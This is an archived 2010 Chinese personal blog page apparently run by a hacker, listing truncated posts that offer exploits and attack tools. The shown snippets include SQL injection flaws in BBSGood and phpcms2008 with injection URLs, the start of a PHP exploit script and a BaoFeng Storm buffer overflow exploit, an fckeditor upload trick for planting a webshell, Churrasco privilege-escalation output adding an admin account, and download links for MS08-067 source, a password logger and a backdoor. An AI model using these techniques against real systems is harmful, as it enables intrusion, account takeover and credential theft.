地瓜吧博客_百度空间
 
日历
 
     
 
个人档案
 
dg8bk

湖北 武汉 
 
   
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
背景音乐
 
     
 
最近访客
 
 

sthnyph
edsf564

171zhifu
hack_zf

♂小战♂
寡欲丶Mine

mezy95
禾城依都
     
 
好友最新文章
 
     
 
最新评论
 
     
 
文章分类
 
     
 
 
文章列表
 
BBSGood论坛程序bottom.asp页面SQL注入漏洞
2010-05-13 22:32

漏洞分析:


在文件bottom.asp中:
key=trim(Request("key")) //第25行
key2=key
key3=key
select case mode
case 1
    if instr(1,key," ")>0 then
        str=Split(key," ")
        key=""
        key3=""
        For ii=0 to UBound(st

阅读全文>>
类别:漏洞利用 | 评论(0) | 浏览()
 
BBSGood论坛indexlabel.asp sql注入漏洞
2010-05-13 22:30

在文件indexlabel.asp中:
sql="select top 1 Admin,UserName,Password from BBSGood_Admin where UserName='"&Request.Cookies(bbsinfo&"adminuser")&"' "   //第115行
Set rs = Server.CreateObject("ADODB.Recordset")
程序没有验证用户是否登陆,导致cookies的值没有过滤而产生注入漏洞

测试方法:
修改cookies值注入

解决方案:
增加用户登陆验证

类别:漏洞利用 | 评论(0) | 浏览()
 
phpcms2008 yp.php 注入利用 EXP
2010-05-09 23:29

发布日期:2010-05.05   
影响版本:phpcms2008
漏洞描述: product.php 注入漏洞,暴出管理员用户密码。
exp代码:
<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(

"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /yp".
"\n\n");
}

function query(

阅读全文>>
类别:漏洞利用 | 评论(0) | 浏览()
 
Https 协议拒绝服务 0day
2010-05-08 22:55


t00ls需要20金币 太黑了 我免费发布了如果我的连接失效可以去饭客安全论坛下载

EXE程序MD5值:777f2e50aeb39e6884c1b0ad7d28a006

下载地

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
暴风影音的最新0DAY_2010.05.06
2010-05-06 23:38

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# EDB-ID: 12516
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lufeng Li and Qingshan Li
# Published: 2010-05-06
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?#!/usr/bin/env python

  

#################################################################

#

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

阅读全文>>
类别:漏洞利用 | 评论(0) | 浏览()
 
phpcms2008 sp3注入漏洞
2010-05-03 21:50

注入yp/company.php?where=%23

进入后台访问
http://www.digua8.cn/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

类别:漏洞利用 | 评论(0) | 浏览()
 
MS08-067的源码
2010-05-02 23:16

下载地址:

http://down.qiannao.com/space/file/qiannao/share/2010/5/2/MS08-002d067.rar/.page

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
fckeditor 2.63 漏洞利用
2010-05-02 22:47

http://www.digua8.cn/fckeditor/editor/filemanager/connectors/test.html

http://www.digua8.cn/fckeditor/editor/filemanager/connectors/uploadtest.html

这个两个页面,是死的关键。上传digua.asa;.jpg

上传之后,路径自然出来了。马为digua.asa; 注意,后面有个;

除了2.63.

Fckeditor 基本上每个

阅读全文>>
类别:漏洞利用 | 评论(0) | 浏览()
 
巴西烤肉免杀360(Churrasco.exe)2010.5.2免杀
2010-05-02 21:53

d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1696
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
lcx全自动内网端口隐射工具
2010-04-05 21:15

连接内网3389

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
portran源码
2010-04-04 21:33



#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
XP,2003登陆密码记录器
2010-04-03 00:14


下载地址:

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
Apache 2.2.14 漏洞利用Exp
2010-03-31 00:38

http://down.qiannao.com/space/

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
Shift后门功能版
2010-03-30 15:00

阅读全文>>
类别:工具收集 | 评论(0) | 浏览()
 
无NET创建管理员用户
2010-03-23 23:01

下载地址:http://down.qiannao.com/space/file/qiannao/share/2010/3/23/digua.rar/.page
类别:工具收集 | 评论(0) | 浏览()
 
更多文章>>
     

帮助中心  |  空间客服  |  投诉中心  |  空间协议
©2012 Baidu